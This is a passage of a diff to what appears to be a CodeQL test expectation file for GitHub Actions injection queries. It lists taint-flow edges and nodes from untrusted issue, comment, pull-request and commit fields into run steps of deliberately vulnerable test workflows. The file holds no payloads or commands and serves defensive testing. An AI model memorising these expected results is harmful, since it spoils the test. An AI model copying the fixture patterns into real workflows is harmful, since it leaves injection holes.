env }}' | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | .github/workflows/matrix.yml:41:12:42:31 | \| | -| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:15:14:16:50 | \| | -| .github/workflows/simple1.yml:11:19:11:57 | ${{ git ... sage }} | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | -| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | -| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:28:14:31:15 | \| | -| .github/workflows/simple2.yml:22:19:22:63 | ${{ ste ... iles }} | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | -| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:14:37:52 | echo ${ ... utput}} | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:17:20:47 | ${{ ste ... value}} | -| .github/workflows/test.yml:15:19:15:57 | ${{ git ... sage }} | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | -| .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | -| .github/workflows/test.yml:20:17:20:47 | ${{ ste ... 
value}} | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | -| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... test }} | -| .github/workflows/test.yml:26:18:26:45 | ${{step ... s.MSG}} | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | +| .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | +| 
.github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | +| .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | 
.github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses 
Step: step [value] | .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | +| .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | +| .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:8:9:14:6 | Uses Step: summary [value] | +| .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | +| .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | +| .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:53 | needs.job1.outputs.job_output | +| .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | +| .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | +| .github/workflows/test.yml:15:20:15:58 | github.event.head_commit.message | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | +| 
.github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | +| .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | .github/workflows/test.yml:18:9:24:6 | Run Step: step1 [MSG] | +| .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | +| .github/workflows/test.yml:26:19:26:46 | steps.step1.outputs.MSG | .github/workflows/test.yml:24:9:29:2 | Run Step: step2 [test] | nodes | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/argus_case_study.yml:17:24:17:52 | ${{gith ... title}} | semmle.label | ${{gith ... title}} | -| .github/workflows/argus_case_study.yml:22:19:22:38 | ${{env.ISSUE_TITLE}} | semmle.label | ${{env.ISSUE_TITLE}} | -| .github/workflows/argus_case_study.yml:26:14:27:95 | \| | semmle.label | \| | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | semmle.label | env.ISSUE_TITLE | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | | .github/workflows/changed-files.yml:16:9:20:6 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | -| .github/workflows/changed-files.yml:21:14:24:15 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:7:12:8:48 | \| | semmle.label | \| | -| .github/workflows/comment_issue.yml:13:12:13:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/comment_issue.yml:15:12:15:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... 
tle }}' | -| .github/workflows/comment_issue_newline.yml:9:14:10:50 | \| | semmle.label | \| | +| .github/workflows/changed-files.yml:22:24:22:75 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/cross3.yml:27:7:37:4 | Uses Step: remove_quotations [replaced] | semmle.label | Uses Step: remove_quotations [replaced] | -| .github/workflows/cross3.yml:32:17:32:52 | ${{gith ... ssage}} | semmle.label | ${{gith ... ssage}} | -| .github/workflows/cross3.yml:39:30:39:74 | ${{step ... laced}} | semmle.label | ${{step ... 
laced}} | -| .github/workflows/cross3.yml:41:12:43:5 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:47:12:53:109 | \| | semmle.label | \| | -| .github/workflows/cross3.yml:57:28:57:72 | ${{step ... laced}} | semmle.label | ${{step ... laced}} | -| .github/workflows/cross3.yml:61:21:68:47 | \| | semmle.label | \| | -| .github/workflows/discussion.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:7:12:7:54 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/discussion_comment.yml:8:12:8:53 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/discussion_comment.yml:9:12:9:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/gollum.yml:7:12:7:52 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:8:12:8:53 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | semmle.label | echo '$ ... 
ame }}' | +| .github/workflows/cross3.yml:32:18:32:53 | github.event.commits[0].message | semmle.label | github.event.commits[0].message | +| .github/workflows/cross3.yml:39:31:39:75 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:42:86:42:113 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/cross3.yml:53:89:53:107 | env.pr_message | semmle.label | env.pr_message | +| .github/workflows/cross3.yml:57:29:57:73 | steps.remove_quotations.outputs.replaced | semmle.label | steps.remove_quotations.outputs.replaced | +| .github/workflows/cross3.yml:68:11:68:38 | env.ISSUE_BODY_PARSED | semmle.label | env.ISSUE_BODY_PARSED | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | semmle.label | github.event.discussion.title | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | semmle.label | github.event.discussion.body | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/gollum.yml:7:19:7:52 | github.event.pages[1].title | semmle.label | github.event.pages[1].title | +| .github/workflows/gollum.yml:8:19:8:53 | github.event.pages[11].title | semmle.label | github.event.pages[11].title | +| .github/workflows/gollum.yml:9:19:9:56 | github.event.pages[0].page_name | semmle.label | github.event.pages[0].page_name | +| .github/workflows/gollum.yml:10:19:10:59 | github.event.pages[2222].page_name | semmle.label | github.event.pages[2222].page_name | | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | 
semmle.label | Run Step: extract-url [initial_url] | -| .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | semmle.label | ${{ git ... body }} | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | semmle.label | github.event.comment.body | | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | semmle.label | Run Step: curl [redirected_url] | -| .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | +| .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | semmle.label | steps.extract-url.outputs.initial_url | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | -| .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | -| .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | +| .github/workflows/image_link_generator.yml:31:28:31:67 | steps.curl.outputs.redirected_url | semmle.label | steps.curl.outputs.redirected_url | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | semmle.label | steps.trim-url.outputs.trimmed_url | | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... 
iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job0.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job1.yml:43:20:43:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... 
alue }} | +| .github/workflows/inter-job2.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job2.yml:45:20:45:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:15:20:15:50 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | -| .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... 
tle }}' | -| .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | semmle.label | echo '$ ... env }}' | -| .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | -| .github/workflows/matrix.yml:15:7:16:4 | Job outputs node [matrix] | semmle.label | Job outputs node [matrix] | -| .github/workflows/matrix.yml:15:15:15:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/matrix.yml:17:9:21:2 | Uses Step: set-matrix | semmle.label | Uses Step: set-matrix | -| .github/workflows/matrix.yml:34:19:34:69 | ${{ fro ... rix) }} | semmle.label | ${{ fro ... rix) }} | -| .github/workflows/matrix.yml:41:12:42:31 | \| | semmle.label | \| | -| .github/workflows/pull_request_review.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review.yml:14:12:14:49 | echo '$ ... ody }}' | semmle.label | echo '$ ... 
ody }}' | -| .github/workflows/pull_request_review_comment.yml:7:12:7:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_review_comment.yml:8:12:8:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_review_comment.yml:9:12:9:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_review_comment.yml:10:12:10:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_review_comment.yml:11:12:11:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_review_comment.yml:12:12:12:69 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/pull_request_review_comment.yml:13:12:13:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_review_comment.yml:14:12:14:50 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:7:12:7:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:8:12:8:48 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:9:12:9:56 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | -| .github/workflows/pull_request_target.yml:10:12:10:55 | echo '$ ... ody }}' | semmle.label | echo '$ ... ody }}' | -| .github/workflows/pull_request_target.yml:11:12:11:61 | echo '$ ... bel }}' | semmle.label | echo '$ ... bel }}' | -| .github/workflows/pull_request_target.yml:12:12:12:75 | echo '$ ... nch }}' | semmle.label | echo '$ ... nch }}' | -| .github/workflows/pull_request_target.yml:13:12:13:72 | echo '$ ... ion }}' | semmle.label | echo '$ ... ion }}' | -| .github/workflows/pull_request_target.yml:14:12:14:69 | echo '$ ... age }}' | semmle.label | echo '$ ... 
age }}' | -| .github/workflows/pull_request_target.yml:15:12:15:59 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/pull_request_target.yml:16:12:16:40 | echo '$ ... ref }}' | semmle.label | echo '$ ... ref }}' | -| .github/workflows/push.yml:7:12:7:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:8:12:8:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:9:12:9:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:10:12:10:57 | echo '$ ... age }}' | semmle.label | echo '$ ... age }}' | -| .github/workflows/push.yml:11:12:11:62 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:12:12:12:61 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:13:12:13:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:14:12:14:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... ame }}' | -| .github/workflows/push.yml:15:12:15:65 | echo '$ ... ail }}' | semmle.label | echo '$ ... ail }}' | -| .github/workflows/push.yml:16:12:16:64 | echo '$ ... ame }}' | semmle.label | echo '$ ... 
ame }}' | +| .github/workflows/inter-job4.yml:30:20:30:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | +| .github/workflows/inter-job4.yml:44:20:44:53 | needs.job1.outputs.job_output | semmle.label | needs.job1.outputs.job_output | +| .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | semmle.label | github.event.issue.body | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | semmle.label | env.global_env | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | semmle.label | env.job_env | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | semmle.label | env.step_env | +| .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | semmle.label | github.event.issue.title | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| .github/workflows/pull_request_review.yml:12:19:12:69 | 
github.event.pull_request.head.repo.homepage | semmle.label | github.event.pull_request.head.repo.homepage | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/pull_request_review.yml:14:19:14:49 | github.event.review.body | semmle.label | github.event.review.body | +| .github/workflows/pull_request_review_comment.yml:7:19:7:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/pull_request_review_comment.yml:8:19:8:55 | github.event.pull_request.body | semmle.label | github.event.pull_request.body | +| .github/workflows/pull_request_review_comment.yml:9:19:9:61 | github.event.pull_request.head.label | semmle.label | github.event.pull_request.head.label | +| .github/workflows/pull_request_review_comment.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | semmle.label | github.event.pull_request.head.repo.default_branch | +| .github/workflows/pull_request_review_comment.yml:11:19:11:72 | github.event.pull_request.head.repo.description | semmle.label | github.event.pull_request.head.repo.description | +| 